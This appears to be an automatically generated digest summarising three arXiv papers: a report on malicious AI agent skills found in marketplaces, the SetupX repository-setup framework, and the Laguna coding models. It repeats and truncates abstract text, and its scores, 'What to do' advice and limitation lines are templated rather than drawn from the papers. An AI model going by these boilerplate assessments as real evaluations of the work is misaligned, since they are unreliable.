Source: arxiv | Overall 6.4/10 | Corroboration: 1
Signal 9.4
Novelty 5.1
Impact 2.0
Confidence 8.7
Actionability 6.5
Summary: arXiv:2605.28588v1 Announce Type: cross Abstract: We analyzed 3,984 AI agent skills from major marketplaces and found 76 confirmed malicious payloads, including credential theft.
- What happened: arXiv:2605.28588v1 Announce Type: cross Abstract: We analyzed 3,984 AI agent skills from major marketplaces and found 76 confirmed malicious payloads, including.
- Why it matters: arXiv:2605.28588v1 Announce Type: cross Abstract: We analyzed 3,984 AI agent skills from major marketplaces and found 76 confirmed malicious payloads, including.
- What to do: Validate with one small internal benchmark and compare against your current baseline this week.
Deep
Context
arXiv:2605.28588v1 Announce Type: cross Abstract: We analyzed 3,984 AI agent skills from major marketplaces and found 76 confirmed malicious payloads, including credential theft, backdoor installation, and data exfiltration.
What's new
This report documents our methodology, presents a threat taxonomy based on real-world samples, and details the attack patterns we observed.
Key details
- 13.4% of all skills contain at least one critical-level security issue and at least 8 manually confirmed malicious skills remain publicly available on clawhub.ai as of the date of publication.
- This report documents our methodology, presents a threat taxonomy based on real-world samples, and details the attack patterns we observed.
- As skill marketplaces grow rapidly and AI agents gain access to sensitive credentials and systems, automated security analysis is no longer optional.
- Computer Science > Cryptography and Security [Submitted on 27 May 2026] Title:Technical Report: Exploring the Emerging Threats of the Agent Skill Ecosystem View PDF HTML (experimental)Abstract:We analyzed 3,984 AI agent skills from major marketplaces and fo...
Results & evidence
- arXiv:2605.28588v1 Announce Type: cross Abstract: We analyzed 3,984 AI agent skills from major marketplaces and found 76 confirmed malicious payloads, including credential theft, backdoor installation, and data exfiltration.
- 13.4% of all skills contain at least one critical-level security issue and at least 8 manually confirmed malicious skills remain publicly available on clawhub.ai as of the date of publication.
- Computer Science > Cryptography and Security [Submitted on 27 May 2026] Title:Technical Report: Exploring the Emerging Threats of the Agent Skill Ecosystem View PDF HTML (experimental)Abstract:We analyzed 3,984 AI agent skills from major marketplaces and fo...
Limitations / unknowns
- Generalization outside curated tasks is still unclear.
Next-step validation checks
- Reproduce one claim with a public baseline and fixed evaluation settings.
- Check robustness on out-of-distribution or long-context cases.
- Track whether independent teams report matching results.
Source: arxiv | Overall 6.4/10 | Corroboration: 1
Signal 9.4
Novelty 5.1
Impact 2.0
Confidence 8.7
Actionability 6.5
Summary: arXiv:2605.26186v2 Announce Type: replace-cross Abstract: Functionality-correct repository setup aims to configure execution environments (e.g., dependencies, build scripts) to.
- What happened: To address this, we introduce SetupX, an experiential learning-based setup framework.
- Why it matters: arXiv:2605.26186v2 Announce Type: replace-cross Abstract: Functionality-correct repository setup aims to configure execution environments (e.g., dependencies, build.
- What to do: Validate with one small internal benchmark and compare against your current baseline this week.
Deep
Context
It presents significant challenges due to diverse, repository-specific failures, including dependency incompatibilities, missing toolchains, incomplete installations, and verification-strategy mismatches.
What's new
First, we construct a Self-Evolving Experience Representation (XPU), a dual-modality knowledge unit encoding setup signals, textual guidance, executable actions to dynamically transfer verified environment fixes to unseen repositories.
Key details
- It presents significant challenges due to diverse, repository-specific failures, including dependency incompatibilities, missing toolchains, incomplete installations, and verification-strategy mismatches.
- Existing LLM agents struggle to robustly resolve these issues, specifically failing to support (1) cross-repository experience transfer, (2) multi-step trial-and-repair under non-invertible state changes, and (3) robust verification of setup outcomes to dis...
- To address this, we introduce SetupX, an experiential learning-based setup framework.
- First, we construct a Self-Evolving Experience Representation (XPU), a dual-modality knowledge unit encoding setup signals, textual guidance, executable actions to dynamically transfer verified environment fixes to unseen repositories.
Results & evidence
- arXiv:2605.26186v2 Announce Type: replace-cross Abstract: Functionality-correct repository setup aims to configure execution environments (e.g., dependencies, build scripts) to successfully execute a repository's documented features.
- Existing LLM agents struggle to robustly resolve these issues, specifically failing to support (1) cross-repository experience transfer, (2) multi-step trial-and-repair under non-invertible state changes, and (3) robust verification of setup outcomes to dis...
- Evaluation results on carefully-crafted benchmarks show SetupX achieves highest performance (e.g., 92% pass rate) and outperforms the strongest baseline by over 19%.
Limitations / unknowns
- It presents significant challenges due to diverse, repository-specific failures, including dependency incompatibilities, missing toolchains, incomplete installations, and verification-strategy mismatches.
- Computer Science > Software Engineering [Submitted on 25 May 2026 (v1), last revised 27 May 2026 (this version, v2)] Title:SetupX: Can LLM Agents Learn from Past Failures in Functionality-Correct Code Repository Setup?
Next-step validation checks
- Reproduce one claim with a public baseline and fixed evaluation settings.
- Check robustness on out-of-distribution or long-context cases.
- Track whether independent teams report matching results.
Source: arxiv | Overall 6.2/10 | Corroboration: 1
Signal 9.4
Novelty 4.0
Impact 2.0
Confidence 8.7
Actionability 6.5
Summary: arXiv:2605.27605v1 Announce Type: new Abstract: We present Laguna M.1 and Laguna XS.2, two Mixture-of-Experts foundation models built for long-horizon, agentic coding: M.1 has.
- What happened: Laguna XS.2 weights are released under Apache~2.0 at https://huggingface.co/collections/poolside/laguna-xs2.
- Why it matters: arXiv:2605.27605v1 Announce Type: new Abstract: We present Laguna M.1 and Laguna XS.2, two Mixture-of-Experts foundation models built for long-horizon, agentic coding.
- What to do: Validate with one small internal benchmark and compare against your current baseline this week.
Deep
Context
arXiv:2605.27605v1 Announce Type: new Abstract: We present Laguna M.1 and Laguna XS.2, two Mixture-of-Experts foundation models built for long-horizon, agentic coding: M.1 has $225.8$B total parameters ($23.4$B activated per token) and XS.2 has $33.4$B tota...
What's new
arXiv:2605.27605v1 Announce Type: new Abstract: We present Laguna M.1 and Laguna XS.2, two Mixture-of-Experts foundation models built for long-horizon, agentic coding: M.1 has $225.8$B total parameters ($23.4$B activated per token) and XS.2 has $33.4$B tota...
Key details
- Both models were trained from scratch end-to-end inside the same internal system that we refer to as our Model Factory: a tightly-integrated stack of versioned data, training, evaluation, and inference components that turn model development into an industri...
- We describe the principles and design choices of the Model Factory and also detail the end-to-end training process of our models, throughout pre-training data and architecture, post-training stages, evaluation, and quantization.
- On agentic software engineering and terminal benchmarks (SWE-bench Verified, SWE-bench Multilingual, SWE-Bench Pro, and Terminal-Bench 2.0) M.1 and XS.2 are competitive with state-of-the-art open models in their respective weight classes.
- Laguna XS.2 weights are released under Apache~2.0 at https://huggingface.co/collections/poolside/laguna-xs2.
Results & evidence
- arXiv:2605.27605v1 Announce Type: new Abstract: We present Laguna M.1 and Laguna XS.2, two Mixture-of-Experts foundation models built for long-horizon, agentic coding: M.1 has $225.8$B total parameters ($23.4$B activated per token) and XS.2 has $33.4$B tota...
- On agentic software engineering and terminal benchmarks (SWE-bench Verified, SWE-bench Multilingual, SWE-Bench Pro, and Terminal-Bench 2.0) M.1 and XS.2 are competitive with state-of-the-art open models in their respective weight classes.
- Laguna XS.2 weights are released under Apache~2.0 at https://huggingface.co/collections/poolside/laguna-xs2.
Limitations / unknowns
- Generalization outside curated tasks is still unclear.
Next-step validation checks
- Reproduce one claim with a public baseline and fixed evaluation settings.
- Check robustness on out-of-distribution or long-context cases.
- Track whether independent teams report matching results.